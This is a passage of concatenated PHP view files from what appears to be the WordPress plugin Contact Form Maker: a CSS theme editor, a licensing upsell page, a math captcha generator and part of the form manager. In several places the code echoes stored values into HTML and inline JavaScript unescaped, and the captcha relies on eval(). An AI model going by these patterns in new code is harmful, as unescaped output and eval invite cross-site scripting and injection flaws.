  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewFormMakerEditCSS_fmc.php000060400000016311152434416630014455 0ustar00<?php

class FMViewFormMakerEditCSS_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;


  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function display() {
    $theme_id = ((isset($_GET['id'])) ? esc_html(stripslashes($_GET['id'])) : '');
    $form_id = ((isset($_GET['form_id'])) ? esc_html(stripslashes($_GET['form_id'])) : 0);
    $row = $this->model->get_theme_row($theme_id);
    wp_print_scripts('jquery');
        
    ?>
    <link media="all" type="text/css" href="<?php echo get_admin_url(); ?>load-styles.php?c=1&amp;dir=ltr&amp;load=admin-bar,dashicons,wp-admin,buttons,wp-auth-check" rel="stylesheet">
    <link media="all" type="text/css" href="<?php echo get_admin_url(); ?>css/colors<?php echo ((get_bloginfo('version') < '3.8') ? '-fresh' : ''); ?>.min.css" id="colors-css" rel="stylesheet">
    <link media="all" type="text/css" href="<?php echo WD_FMC_URL . '/css/form_maker_tables.css'; ?>" rel="stylesheet">
    <script src="<?php echo WD_FMC_URL . '/js/form_maker_admin.js'; ?>" type="text/javascript"></script>
    <script src="<?php echo WD_FMC_URL . '/js/layout/codemirror.js'; ?>" type="text/javascript"></script>
    <script src="<?php echo WD_FMC_URL . '/js/layout/formatting.js'; ?>" type="text/javascript"></script>
    <script src="<?php echo WD_FMC_URL . '/js/layout/css.js'; ?>" type="text/javascript"></script>
    <script src="<?php echo WD_FMC_URL . '/js/layout/clike.js'; ?>" type="text/javascript"></script>
    <script src="<?php echo WD_FMC_URL . '/js/layout/javascript.js'; ?>" type="text/javascript"></script>
    <script src="<?php echo WD_FMC_URL . '/js/layout/htmlmixed.js'; ?>" type="text/javascript"></script>
    <script src="<?php echo WD_FMC_URL . '/js/layout/xml.js'; ?>" type="text/javascript"></script>
    <script src="<?php echo WD_FMC_URL . '/js/layout/php.js'; ?>" type="text/javascript"></script>
    <link media="all" type="text/css" href="<?php echo WD_FMC_URL . '/css/codemirror.css'; ?>" rel="stylesheet">
    
    <style>
		.CodeMirror {
			border: 1px solid #ccc;
			font-size: 12px;
			margin-bottom: 6px;
			background: white;
		}
    </style>

    <form id="fm_theme" class="wrap wp-core-ui" method="post" action="#" style="width: 99%; padding-left:3px;">
		<div class="fm-page-header">
			<div class="fm-page-actions">
				<button class="fm-button save-button small" onclick="if (fm_check_required('title', 'Theme title')) {return false;}; fm_save_theme('save'); window.parent.jQuery('#theme option[value=<?php echo $theme_id; ?>]').html(jQuery('#title').val()); window.parent.tb_remove();">
					<span></span>
					Save
				</button>
				<button class="fm-button apply-button small" onclick="if (fm_check_required('title', 'Theme title')) {return false;}; fm_save_theme('apply'); window.parent.jQuery('#theme option[value=<?php echo $theme_id; ?>]').html(jQuery('#title').val()); return false;">
					<span></span>
					Apply
				</button>
				<button class="fm-button save-as-copy-button medium" onclick="if (fm_check_required('title', 'Theme title')) {return false;}; fm_save_theme('save_as_new'); window.parent.jQuery('#theme').append('<option value=0>' + jQuery('#title').val() + '</option>'); window.parent.tb_remove(); return false;">
					<span></span>
					Save as New
				</button>
				<button class="fm-button undo-button small" onclick="fm_reset_theme(); return false;">
					<span></span>
					Reset
				</button>
				<button class="fm-button cancel-button small" onclick="window.parent.tb_remove();">
					<span></span>
					Cancel
				</button>
			</div>
			<div class="fm-clear"></div>
		</div>
		<table style="clear: both;">
			<tbody>
				<tr>
					<td class="fm_label"><label for="title">Theme title: <span style="color:#FF0000;"> * </span> </label></td>
					<td><input type="text" id="title" name="title" value="<?php echo $row->title; ?>" class="fm_text_input" /></td>
				</tr>
				<tr>
					<td class="fm_label"><label for="css">Css: </label></td>
					<td style="width: 90%;"><textarea id="css" name="css" rows="25" style="width: 100%;"><?php echo htmlspecialchars($row->css); ?></textarea></td>
				</tr>
			</tbody>
		</table>
		<div style="display: none;" id="main_theme"><?php echo str_replace('"', '\"', $row->css); ?></div>
		<input type="hidden" id="task" name="task" value="" />
		<input type="hidden" id="current_id" name="current_id" value="<?php echo $row->id; ?>" />
		<input type="hidden" id="default" name="default" value="<?php echo $row->default; ?>" />
		<input type="hidden" name="form_id" id="form_id" value="<?php echo $form_id; ?>" />
    </form>
    <script>
		var editor = CodeMirror.fromTextArea(
			document.getElementById("css"), {
			lineNumbers: true,
			lineWrapping: true,
			mode: "css"
		});
      
		CodeMirror.commands["selectAll"](editor);
		editor.autoFormatRange(editor.getCursor(true), editor.getCursor(false));
		editor.scrollTo(0,0);
		
		function fm_save_theme(task) {
			fm_set_input_value('task', task);
			document.getElementById('fm_theme').submit();
		}
		
		function fm_reset_theme() {
			editor.setValue(jQuery('#main_theme').html())
			jQuery('#css').val(jQuery('#main_theme').html()); 
		}
		
    </script>
    <?php
    die();
  }
  
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewLicensing_fmc.php000060400000010514152434416630013325 0ustar00<?php

class FMViewLicensing_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;


  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function display() {
	wp_register_style('fm_license', WD_FMC_URL . '/css/license.css', array(), get_option("wd_form_maker_version"));
	wp_print_styles('fm_license');
    ?>
    <div style="width:99%">
      <div id="featurs_tables">
		  <div id="featurs_table1">
			<span>Unlimited Fields</span>
			<span>File Upload Field</span>
			<span>Google Map</span>
			<span>PayPal Integration</span>
			<span>Front-End Submissions</span>
			<span>Add-ons support</span>
		  </div>
		  <div id="featurs_table2">
			<span>Free</span>
			<span class="no"></span>
			<span class="no"></span>
			<span class="no"></span>
			<span class="no"></span>
			<span class="no"></span>
			<span class="no"></span>
		  </div>
		  <div id="featurs_table3">
			<span>Pro Version</span>
			<span class="yes"></span>
			<span class="yes"></span>
			<span class="yes"></span>
			<span class="yes"></span>
			<span class="yes"></span>
			<span class="yes"></span>
		  </div>
		</div>
	<div style="float: right; text-align: right;">
        <a style="text-decoration: none;" target="_blank" href="https://web-dorado.com/files/fromContactForm.php">
          <img width="215" border="0" alt="web-dorado.com" src="<?php echo WD_FMC_URL . '/images/wd_logo.png'; ?>" />
        </a>
      </div>
	<div style="float: left; clear: both;">
      <a href="https://web-dorado.com/files/fromContactForm.php" class="button-primary" target="_blank">Purchase a License</a>
      <br/><br/>
      <p>After purchasing the commercial version follow these steps:</p>
      <ol>
        <li>Deactivate Contact Form Maker Plugin.</li>
        <li>Delete Contact Form Maker Plugin.</li>
        <li>Install the downloaded commercial version of the plugin.</li>
      </ol>
      <br/>
      <p>If you enjoy using Contact Form Maker and find it useful, please consider making a donation. Your donation will help encourage and support the plugin's continued development and better user support.</p>
      <br/>
      <a href="https://web-dorado.com/files/donate_redirect.php" target="_blank">
	  <div class="fm-get-pro"></div>
	  </a>
    </div>
    <?php
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewFormcontactwdmathcaptcha.php000060400000012664152434416630015605 0ustar00<?php

class FMViewFormcontactwdmathcaptcha {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;


  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
	public function display() {
		if (isset($_GET['action']) && esc_html($_GET['action']) == 'formcontactwdmathcaptcha') {
			$i = (isset($_GET["i"]) ? esc_html($_GET["i"]) : '');
			$r2 = (isset($_GET["r2"]) ? (int) $_GET["r2"] : 0);
			$rrr = (isset($_GET["rrr"]) ? (int) $_GET["rrr"] : 0);
			$randNum = 0 + $r2 + $rrr;
			$operations_count = ((isset($_GET["operations_count"]) && (int)$_GET["operations_count"]) ? ((int)$_GET["operations_count"] > 5 ? 5 : (int)$_GET["operations_count"]) : 1);
			$operations = (isset($_GET["operations"]) ? str_replace('@', '+', $_GET["operations"]) : '+,-');
			$operations = preg_replace('/\s+/', '', $operations);
			$cap_width = 2*($operations_count+1) * 20 + 10;
			$cap_height = 26;
			$cap_quality = 100;
	  
			$code = $this->code_generic($operations_count, $operations);
			if (session_id() == '' || (function_exists('session_status') && (session_status() == PHP_SESSION_NONE))) {
				@session_start();
			}
			
			$_SESSION[$i . '_wd_arithmetic_captcha_code'] = md5($code[1]);
			$canvas = imagecreatetruecolor($cap_width, $cap_height);
			
			$c = imagecolorallocate($canvas, rand(150, 255), rand(150, 255), rand(150, 255));
			imagefilledrectangle($canvas, 0, 0, $cap_width, $cap_height, $c);
			$code = $code[0];
			$count = strlen($code);
			$color_text = imagecolorallocate($canvas, 0, 0, 0);
			for ($it = 0; $it < $count; $it++) {
				$letter = $code[$it];
				imagestring($canvas, 6, (10 * $it + 10), $cap_height / 4, $letter, $color_text);
			}
			for ($c = 0; $c < 150; $c++) {
				$x = rand(0, $cap_width - 1);
				$y = rand(0, 29);
				$col = '0x' . rand(0, 9) . '0' . rand(0, 9) . '0' . rand(0, 9) . '0';
				imagesetpixel($canvas, $x, $y, $col);
			}
			header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
			header('Cache-Control: no-store, no-cache, must-revalidate');
			header('Cache-Control: post-check=0, pre-check=0', FALSE);
			header('Pragma: no-cache');
			header('Content-Type: image/jpeg');
			imagejpeg($canvas, NULL, $cap_quality);
		}
		die('');
	}

	private function code_generic($_length, $_operations) {
		$cap = '';
        $dig = array(0, 1, 2, 3, 4, 5, 6, 7, 8, 9);
		$valid_oprations = array('+', '-', '*', '/');
		$operations_array = array_filter(explode(',', $_operations));
		foreach($operations_array as $key => $operation) {
			if(!in_array($operation, $valid_oprations))
				unset($operations_array[$key]);
		}
		
		for($k=0; $k <= $_length; $k++) {
			if(substr($cap, -1) == '/' ) {
				$operations_array = array_diff($operations_array, array('/'));
				$num_divisors = $this->arrayOfNumberDivisors(substr($cap, -2, 1));
				$cap .= $num_divisors[array_rand($num_divisors)];
			}	
			else
				$cap .= $dig[array_rand($dig)];
	
			if($k != $_length)
				$cap .= $operations_array[array_rand($operations_array)];
		}
		$pass = eval('return '.$cap.';');
		if($pass < 0)
			return $this->code_generic($_length, $_operations);
		$cap .= '=';
		$cap = implode(' ',str_split($cap));

        return array($cap, $pass);
    }
  
	public function arrayOfNumberDivisors($x) {
		$divisors = array ();
		if($x == 0)
			$divisors[] = rand(1, 9);
			
		for($i = 1; $i <= $x; $i ++) {
			if ($x % $i == 0) {
				$divisors [] = $i;
			}
		}
		return $divisors;
	}
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewManage_fmc.php000060400000701647152434416630012620 0ustar00<?php

class FMViewManage_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;

  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
	public function display() {
		$rows_data = $this->model->get_rows_data();
		$page_nav = $this->model->page_nav();
		$search_value = ((isset($_POST['search_value'])) ? esc_html($_POST['search_value']) : '');
		$search_select_value = ((isset($_POST['search_select_value'])) ? (int) $_POST['search_select_value'] : 0);
		$asc_or_desc = ((isset($_POST['asc_or_desc']) && $_POST['asc_or_desc'] == 'desc') ? 'desc' : 'asc');
		$order_by_array = array('id', 'title', 'mail');
		$order_by = isset($_POST['order_by']) && in_array(esc_html(stripslashes($_POST['order_by'])), $order_by_array) ? esc_html(stripslashes($_POST['order_by'])) :  'id';
		$order_class = 'manage-column column-title sorted ' . $asc_or_desc;
		$ids_string = '';
		?>
		<div class="fm-user-manual">
			This section allows you to create, edit forms.
			<a style="color: blue; text-decoration: none;" target="_blank" href="https://web-dorado.com/wordpress-form-maker-guide-2.html">Read More in User Manual</a>
		</div>
		<div class="fm-upgrade-pro">
			<a target="_blank" href="https://web-dorado.com/files/fromContactForm.php">
				<div class="fm-upgrade-img">
					UPGRADE TO PRO VERSION 
					<span></span>
				</div>
			</a>
		</div>
		<div class="fm-clear"></div>
		<form onkeypress="fm_doNothing(event)" class="wrap" id="manage_form" method="post" action="admin.php?page=manage_fmc" style="width:99%;">
			<?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>
			<div class="fm-page-banner">
				<div class="fm-logo">
				</div>
				<div class="fm-logo-title">Contact Form</br>Maker</div>
				<button class="fm-button add-button medium" onclick="fm_set_input_value('task', 'add'); fm_form_submit(event, 'manage_form')">
					<span></span>
					Add New
				</button>
			</div>	 
			<div class="tablenav top">
			<?php
				WDW_FMC_Library::search('Title', $search_value, 'manage_form');
				WDW_FMC_Library::html_page_nav($page_nav['total'], $page_nav['limit'], 'manage_form');
			?>
			</div>
			<table class="wp-list-table widefat fixed pages">
				<thead>
					<th class="manage-column column-cb check-column table_small_col"><input id="check_all" type="checkbox" style="margin:0;"/></th>
					<th class="table_small_col <?php if ($order_by == 'id') { echo $order_class; } ?>">
						<a onclick="fm_set_input_value('task', ''); fm_set_input_value('order_by', 'id'); fm_set_input_value('asc_or_desc', '<?php echo (($order_by == 'id' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>'); fm_form_submit(event, 'manage_form')" href="">
						<span>ID</span><span class="sorting-indicator"></span></a>
					</th>
					<th class="<?php if ($order_by == 'title') { echo $order_class; } ?>">
						<a onclick="fm_set_input_value('task', ''); fm_set_input_value('order_by', 'title'); fm_set_input_value('asc_or_desc', '<?php echo (($order_by == 'title' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>'); fm_form_submit(event, 'manage_form')" href="">
						<span>Title</span><span class="sorting-indicator"></span></a>
					</th>
					<th class="<?php if ($order_by == 'mail') { echo $order_class; } ?>">
						<a onclick="fm_set_input_value('task', ''); fm_set_input_value('order_by', 'mail'); fm_set_input_value('asc_or_desc', '<?php echo (($order_by == 'mail' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>'); fm_form_submit(event, 'manage_form')" href="">
						<span>Email to send submissions to</span><span class="sorting-indicator"></span></a>
					</th>
					<th class="table_big_col">Shortcode</th>
					<th class="table_large_col">PHP function</th>
					<th class="table_small_col">Edit</th>
					<th class="table_small_col">
						<a title="Delete selected items" href="" onclick="if (confirm('Do you want to delete selected items?')) { fm_set_input_value('task', 'delete_all'); fm_form_submit(event, 'manage_form'); } else { return false; }">Delete</a>
					</th>
				</thead>
				<tbody id="tbody_arr">
					<?php
					if ($rows_data) {
						foreach ($rows_data as $row_data) {
							$alternate = (!isset($alternate) || $alternate == '') ? 'class="alternate"' : '';
							$old = '';
							if (isset($row_data->form) && ($row_data->form != '')) {
								$old = '_old';
							}
							?>
							<tr id="tr_<?php echo $row_data->id; ?>" <?php echo $alternate; ?>>
								<td class="table_small_col check-column">
									<input id="check_<?php echo $row_data->id; ?>" name="check_<?php echo $row_data->id; ?>" type="checkbox"/>
								</td>
								<td class="table_small_col"><?php echo $row_data->id; ?></td>
								<td>
									<a onclick="fm_set_input_value('task', 'edit<?php echo $old; ?>'); fm_set_input_value('current_id', '<?php echo $row_data->id; ?>'); fm_form_submit(event, 'manage_form')" href="" title="Edit"><?php echo $row_data->title; ?></a>
								</td>
								<td><?php echo $row_data->mail; ?></td>
								<td class="table_big_col" style="padding-left: 0; padding-right: 0;">
									<input type="text" value='[wd_contact_form id="<?php echo $row_data->id; ?>"]' onclick="fm_select_value(this)" size="12" readonly="readonly" style="padding-left: 1px; padding-right: 1px;"/>
								</td>
								<td class="table_large_col" style="padding-left: 0; padding-right: 0;">
									<input type="text" value='&#60;?php wd_contact_form_maker(<?php echo $row_data->id; ?>); ?&#62;' onclick="fm_select_value(this)"  readonly="readonly" style="padding-left: 1px; padding-right: 1px;"/>
								</td>
								<td class="table_small_col">
									<button class="fm-icon edit-icon" onclick="fm_set_input_value('task', 'edit<?php echo $old; ?>');  fm_set_input_value('current_id', '<?php echo $row_data->id; ?>'); fm_form_submit(event, 'manage_form')">
										<span></span>
									</button>
								</td>
								<td class="table_small_col">
									<button class="fm-icon delete-icon" onclick="if (confirm('Do you want to delete selected item(s)?')) { fm_set_input_value('task', 'delete'); fm_set_input_value('current_id', '<?php echo $row_data->id; ?>'); fm_form_submit(event, 'manage_form'); } else { return false; }">
										<span></span>
									</button>
								</td>
							</tr>
							<?php
							$ids_string .= $row_data->id . ',';
						}
					}
					?>
				</tbody>
			</table>
			<input id="task" name="task" type="hidden" value=""/>
			<input id="current_id" name="current_id" type="hidden" value=""/>
			<input id="ids_string" name="ids_string" type="hidden" value="<?php echo $ids_string; ?>"/>
			<input id="asc_or_desc" name="asc_or_desc" type="hidden" value="asc"/>
			<input id="order_by" name="order_by" type="hidden" value="<?php echo $order_by; ?>"/>
		</form>
		<?php
	}

	public function edit($id) {
		?>
		<img src="<?php echo WD_FMC_URL . '/images/buttons.png'; ?>" style="display:none;"/>
		<?php
		$row = $this->model->get_row_data_new($id);
		$themes = $this->model->get_theme_rows_data();
		$labels = array();
		$label_id = array();
		$label_order_original = array();
		$label_type = array();
		$label_all = explode('#****#', $row->label_order);
		$label_all = array_slice($label_all, 0, count($label_all) - 1);
		foreach ($label_all as $key => $label_each) {
			$label_id_each = explode('#**id**#', $label_each);
			array_push($label_id, $label_id_each[0]);
			$label_oder_each = explode('#**label**#', $label_id_each[1]);
			array_push($label_order_original, addslashes($label_oder_each[0]));
			array_push($label_type, $label_oder_each[1]);
		}
		$labels['id'] = '"' . implode('","', $label_id) . '"';
		$labels['label'] = '"' . implode('","', $label_order_original) . '"';
		$labels['type'] = '"' . implode('","', $label_type) . '"';
		$page_title = (($id != 0) ? 'Edit form ' . $row->title : 'Create new form');
		?>
		<script type="text/javascript">
			var plugin_url = "<?php echo WD_FMC_URL; ?>";
			var field_limitation = "<?php echo get_option("wd_cfield_limit", ''); ?>";
		</script>
		<script src="<?php echo WD_FMC_URL . '/js/formmaker_div_free.js'; ?>?ver=<?php echo get_option("wd_form_maker_version"); ?>" type="text/javascript"></script>
		<script type="text/javascript">
			form_view = 1;
			form_view_count = 1;
			form_view_max = 1;
			function submitbutton() {
			<?php if ($id) { ?>
				if (!document.getElementById('araqel') || (document.getElementById('araqel').value == '0')) {
					alert('Please wait while page loading.');
					return false;
				}
			<?php } ?>
			tox = '';
			form_fields = '';
			document.getElementById('take').style.display = "none";
			document.getElementById('page_bar').style.display = "none";
			jQuery('#saving').html('<div class="fm-loading-container"><div class="fm-loading-content"></div></div>');
			jQuery('.wdform_section').each(function() {
				var this2 = this;
				jQuery(this2).find('.wdform_column').each(function() {
					if(!jQuery(this).html() && jQuery(this2).children().length>1)
						jQuery(this).remove();
				});
			});
			remove_whitespace(document.getElementById('take'));
			l_id_array = [<?php echo $labels['id']?>];
			l_label_array = [<?php echo $labels['label']?>];
			l_type_array = [<?php echo $labels['type']?>];
			l_id_removed = [];      
			for (x = 0; x < l_id_array.length; x++) {
				l_id_removed[l_id_array[x]] = true;
			}
			for (t = 1; t <= form_view_max; t++) {
			  if (document.getElementById('form_id_tempform_view' + t)) {
				wdform_page = document.getElementById('form_id_tempform_view' + t);
				remove_whitespace(wdform_page);
				n = wdform_page.childNodes.length - 2;
				for (q = 0; q <= n; q++) {
				  if (!wdform_page.childNodes[q].getAttribute("wdid")) {
					wdform_section = wdform_page.childNodes[q];
					for (x = 0; x < wdform_section.childNodes.length; x++) {
					  wdform_column = wdform_section.childNodes[x];
					  if (wdform_column.firstChild) {
						for (y=0; y < wdform_column.childNodes.length; y++) {
						  is_in_old = false;
						  wdform_row = wdform_column.childNodes[y];
						  if (wdform_row.nodeType == 3) {
							continue;
						  }
						  wdid = wdform_row.getAttribute("wdid");
						  if (!wdid) {
							continue;
						  }
						  l_id = wdid;
						  l_label = document.getElementById(wdid + '_element_labelform_id_temp').innerHTML;
						  l_label = l_label.replace(/(\r\n|\n|\r)/gm," ");
						  wdtype = wdform_row.firstChild.getAttribute('type');

						  for (var z = 0; z < l_id_array.length; z++) {
							if (l_type_array[z] == "type_address") {
								if (document.getElementById(l_id + "_mini_label_street1") || document.getElementById(l_id + "_mini_label_street2") || document.getElementById(l_id + "_mini_label_city") || document.getElementById(l_id + "_mini_label_state") || document.getElementById(l_id+"_mini_label_postal") || document.getElementById(l_id+"_mini_label_country")) {
								  l_id_removed[l_id_array[z]] = false;
								}
							}
							else {
								if (l_id_array[z] == wdid) {
									l_id_removed[l_id] = false;
								}
							}
							
						  }

						  if (wdtype == "type_address") {
							addr_id = parseInt(wdid);
							id_for_country = addr_id;
							if (document.getElementById(id_for_country + "_mini_label_street1"))
							  tox = tox + addr_id + '#**id**#' + document.getElementById(id_for_country + "_mini_label_street1").innerHTML + '#**label**#type_address#****#';
							addr_id++; 
							if (document.getElementById(id_for_country + "_mini_label_street2"))
							  tox = tox + addr_id + '#**id**#' + document.getElementById(id_for_country + "_mini_label_street2").innerHTML + '#**label**#type_address#****#';
							addr_id++;
							if (document.getElementById(id_for_country+"_mini_label_city"))
							  tox = tox + addr_id + '#**id**#' + document.getElementById(id_for_country + "_mini_label_city").innerHTML + '#**label**#type_address#****#';
							addr_id++;
							if (document.getElementById(id_for_country + "_mini_label_state"))
							  tox = tox + addr_id + '#**id**#' + document.getElementById(id_for_country + "_mini_label_state").innerHTML + '#**label**#type_address#****#';
							addr_id++;
							if (document.getElementById(id_for_country + "_mini_label_postal"))
							  tox = tox + addr_id + '#**id**#' + document.getElementById(id_for_country + "_mini_label_postal").innerHTML + '#**label**#type_address#****#';
							addr_id++;
							if (document.getElementById(id_for_country+"_mini_label_country")) {
							  tox=tox + addr_id + '#**id**#' + document.getElementById(id_for_country + "_mini_label_country").innerHTML + '#**label**#type_address#****#';
							}
							
						  }
						  else {
							tox = tox + wdid + '#**id**#' + l_label + '#**label**#' + wdtype + '#****#';
						  }
						
						  id = wdid;
						  form_fields += wdid + "*:*id*:*";
						  form_fields += wdtype + "*:*type*:*";
						  w_choices = new Array();
						  w_choices_value=new Array();
						  w_choices_checked = new Array();
						  w_choices_disabled = new Array();
						  w_choices_params =new Array();
						  w_allow_other_num = 0;
						  w_property = new Array();
						  w_property_type = new Array();
						  w_property_values = new Array();
						  w_choices_price = new Array();
						  if (document.getElementById(id+'_element_labelform_id_temp').innerHTML) {
							w_field_label = document.getElementById(id + '_element_labelform_id_temp').innerHTML.replace(/(\r\n|\n|\r)/gm," ");
						  }
						  else {                      
							w_field_label = " ";
						  }
						  if (document.getElementById(id + '_label_sectionform_id_temp')) {
							if (document.getElementById(id + '_label_sectionform_id_temp').style.display == "block") {
							  w_field_label_pos = "top";
							}
							else {
							  w_field_label_pos = "left";
							}
						  }
						  if (document.getElementById(id + "_elementform_id_temp")) {
							s = document.getElementById(id + "_elementform_id_temp").style.width;
							w_size=s.substring(0,s.length - 2);
						  }
						  if (document.getElementById(id + "_label_sectionform_id_temp")) {
							s = document.getElementById(id + "_label_sectionform_id_temp").style.width;
							w_field_label_size = s.substring(0, s.length - 2);
						  }
						  if (document.getElementById(id + "_requiredform_id_temp")) {
							w_required = document.getElementById(id + "_requiredform_id_temp").value;
						  }
						  if (document.getElementById(id + "_uniqueform_id_temp")) {
							w_unique = document.getElementById(id + "_uniqueform_id_temp").value;
						  }
						  if (document.getElementById(id + '_label_sectionform_id_temp')) {
							w_class = document.getElementById(id + '_label_sectionform_id_temp').getAttribute("class");
							if (!w_class) {
							  w_class = "";
							}
						  }
						  gen_form_fields();
						  wdform_row.innerHTML = "%" + id + " - " + l_label + "%";
						}
					  }
					}
				  }
				  else {
					id = wdform_page.childNodes[q].getAttribute("wdid");
					w_editor = document.getElementById(id + "_element_sectionform_id_temp").innerHTML;
					form_fields += id + "*:*id*:*";
					form_fields += "type_section_break" + "*:*type*:*";
					form_fields += "custom_" + id + "*:*w_field_label*:*";
					form_fields += w_editor + "*:*w_editor*:*";
					form_fields += "*:*new_field*:*";
					wdform_page.childNodes[q].innerHTML = "%" + id + " - " + "custom_" + id + "%";
				  }
				}
			  }	
			}
			document.getElementById('label_order_current').value = tox;

			for (x = 0; x < l_id_array.length; x++) {
				if (l_id_removed[l_id_array[x]]) {
					tox = tox + l_id_array[x] + '#**id**#' + l_label_array[x] + '#**label**#' + l_type_array[x] + '#****#';
				}
			}

			document.getElementById('label_order').value = tox;
			document.getElementById('form_fields').value = form_fields;
			refresh_(); 
			document.getElementById('pagination').value=document.getElementById('pages').getAttribute("type");
			document.getElementById('show_title').value=document.getElementById('pages').getAttribute("show_title");
			document.getElementById('show_numbers').value=document.getElementById('pages').getAttribute("show_numbers");
			return true;
		}

		gen = <?php echo (($id != 0) ? $row->counter : 1); ?>;

		function enable() {
			alltypes = Array('customHTML', 'text', 'checkbox', 'radio', 'time_and_date', 'select', 'file_upload', 'captcha', 'map', 'button', 'page_break', 'section_break', 'paypal', 'survey');
			for (x = 0; x < 14; x++) {
				document.getElementById('img_' + alltypes[x]).src = "<?php echo WD_FMC_URL . '/images/'; ?>" + alltypes[x] + ".png?ver=<?php echo get_option("wd_form_maker_version"); ?>";
			}
			if (document.getElementById('formMakerDiv').style.display == 'block') {
				jQuery('#formMakerDiv').slideToggle(200);
			}
			else {
				jQuery('#formMakerDiv').slideToggle(400);
			}
			
			if (document.getElementById('formMakerDiv1').style.display == 'block') {
				jQuery('#formMakerDiv1').slideToggle(200);
			}
			else {
				jQuery('#formMakerDiv1').slideToggle(400);
			}
			document.getElementById('when_edit').style.display = 'none';
		}

		function enable2() {
			alltypes = Array('customHTML', 'text', 'checkbox', 'radio', 'time_and_date', 'select', 'file_upload', 'captcha', 'map', 'button', 'page_break', 'section_break', 'paypal', 'survey');
			for (x = 0; x < 14; x++) {
				document.getElementById('img_' + alltypes[x]).src = "<?php echo WD_FMC_URL . '/images/'; ?>" + alltypes[x] + ".png?ver=<?php echo get_option("wd_form_maker_version"); ?>";
			}
			if (document.getElementById('formMakerDiv').style.display == 'block') {
				jQuery('#formMakerDiv').slideToggle(200);
			}
			else {
				jQuery('#formMakerDiv').slideToggle(400);
			}
			
			if (document.getElementById('formMakerDiv1').style.display == 'block') {
				jQuery('#formMakerDiv1').slideToggle(200);
			}
			else {
				jQuery('#formMakerDiv1').slideToggle(400);
			}
			document.getElementById('when_edit').style.display = 'block';
			if (document.getElementById('field_types').offsetWidth) {
				document.getElementById('when_edit').style.width = document.getElementById('field_types').offsetWidth + 'px';
			}
			if (document.getElementById('field_types').offsetHeight) {
				document.getElementById('when_edit').style.height = document.getElementById('field_types').offsetHeight + 'px';
			}
		}
		</script>
		<div class="fm-user-manual">
			This section allows you to add fields to your form.
			<a style="color: blue; text-decoration: none;" target="_blank" href="https://web-dorado.com/wordpress-form-maker-guide-4.html">Read More in User Manual</a>
		</div>
		<div class="fm-upgrade-pro">
			<a target="_blank" href="https://web-dorado.com/files/fromContactForm.php">
				<div class="fm-upgrade-img">
